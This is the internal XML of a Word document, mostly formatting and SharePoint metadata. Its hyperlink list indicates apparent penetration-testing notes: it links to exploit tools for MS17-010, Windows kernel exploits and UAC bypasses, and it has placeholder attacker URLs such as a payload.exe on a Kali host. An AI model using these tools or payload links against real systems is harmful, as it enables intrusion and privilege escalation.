                                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                  </w:divBdr>
                                                  <w:divsChild>
                                                    <w:div w:id="328213786">
                                                      <w:marLeft w:val="0"/>
                                                      <w:marRight w:val="0"/>
                                                      <w:marTop w:val="0"/>
                                                      <w:marBottom w:val="0"/>
                                                      <w:divBdr>
                                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                      </w:divBdr>
                                                      <w:divsChild>
                                                        <w:div w:id="1619331933">
                                                          <w:marLeft w:val="0"/>
                                                          <w:marRight w:val="0"/>
                                                          <w:marTop w:val="0"/>
                                                          <w:marBottom w:val="0"/>
                                                          <w:divBdr>
                                                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                          </w:divBdr>
                                                          <w:divsChild>
                                                            <w:div w:id="162210174">
                                                              <w:marLeft w:val="0"/>
                                                              <w:marRight w:val="0"/>
                                                              <w:marTop w:val="0"/>
                                                              <w:marBottom w:val="0"/>
                                                              <w:divBdr>
                                                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                              </w:divBdr>
                                                            </w:div>
                                                          </w:divsChild>
                                                        </w:div>
                                                        <w:div w:id="687216025">
                                                          <w:marLeft w:val="0"/>
                                                          <w:marRight w:val="0"/>
                                                          <w:marTop w:val="0"/>
                                                          <w:marBottom w:val="0"/>
                                                          <w:divBdr>
                                                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                          </w:divBdr>
                                                          <w:divsChild>
                                                            <w:div w:id="2171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163100">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1359234873">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1831478633">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1847213467">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1810978735">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="327561973">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="149904524">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="1965118957">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                      <w:divsChild>
                                        <w:div w:id="591859909">
                                          <w:marLeft w:val="0"/>
                                          <w:marRight w:val="0"/>
                                          <w:marTop w:val="0"/>
                                          <w:marBottom w:val="0"/>
                                          <w:divBdr>
                                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                          </w:divBdr>
                                          <w:divsChild>
                                            <w:div w:id="619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989392">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="15232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P/DOMAIN)" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://(IP/DOMAIN)/webdav/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://(KALI)/payload.exe" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item3.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://github.com/AonCyberLabs/Windows-Exploit-Suggest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List_of_TCP_and_UDP_port_numbers" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2017-0144"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vd.nist.gov/vuln/detail/CVE-2014-0160" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/3ndG4me/AutoBlue-MS17-010" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.jxplorer.org/downloads/us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ibeenpwned.com" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><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IP/DOMAIN)" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hfiref0x/UACME" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BeyondTrust/pbis-open/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://(IP/DOMAIN)/webdav/"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https://gist.github.com/sundowndev/283efaddbcf896ab405488330d1bbc06" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://(IP/DOMAIN)" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SecWiki/windows-kernel-exploits" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ropnop/windapsearch" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://directory.apache.org/studio/download/download-linux.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21A9D669F9444897CC5E4556E4C4E" ma:contentTypeVersion="14" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="eda4254654d8dfbe55ea0f308e8a1bd6">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="397680dc-95c9-4de1-9227-14187644d916" xmlns:ns3="3abd812f-7777-4e58-9325-0eb5962f5266" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="08c80d6e0a290453a9f57add2bf7df74" ns2:_="" ns3:_="">
    <xsd:import namespace="397680dc-95c9-4de1-9227-14187644d916"/>
    <xsd:import namespace="3abd812f-7777-4e58-9325-0eb5962f52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680dc-95c9-4de1-9227-14187644d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d812f-7777-4e58-9325-0eb5962f52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3ecaa1-da2f-43f9-912a-a5916baeb6b4}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="3abd812f-7777-4e58-9325-0eb5962f526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680dc-95c9-4de1-9227-14187644d916">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </lcf76f155ced4ddcb4097134ff3c332f>
    <TaxCatchAll xmlns="3abd812f-7777-4e58-9325-0eb5962f52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1CC8-528A-417B-9F0A-AF2723202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680dc-95c9-4de1-9227-14187644d916"/>
    <ds:schemaRef ds:uri="3abd812f-7777-4e58-9325-0eb5962f5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C379B-8FFC-433C-862A-0A0D72787C8C}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DA89C790-FD0F-4A02-BB67-DDBC1E2F3123}">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3abd812f-7777-4e58-9325-0eb5962f5266"/>
    <ds:schemaRef ds:uri="397680dc-95c9-4de1-9227-14187644d916"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{5D5822C8-D6EF-4EBE-AA25-2B9F201F27CB}">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2</Pages>
  <Words>17380</Words>
  <Characters>9906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 Daniel</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Feliciano, Daniel</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-11T15:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-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21A9D669F9444897CC5E4556E4C4E</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>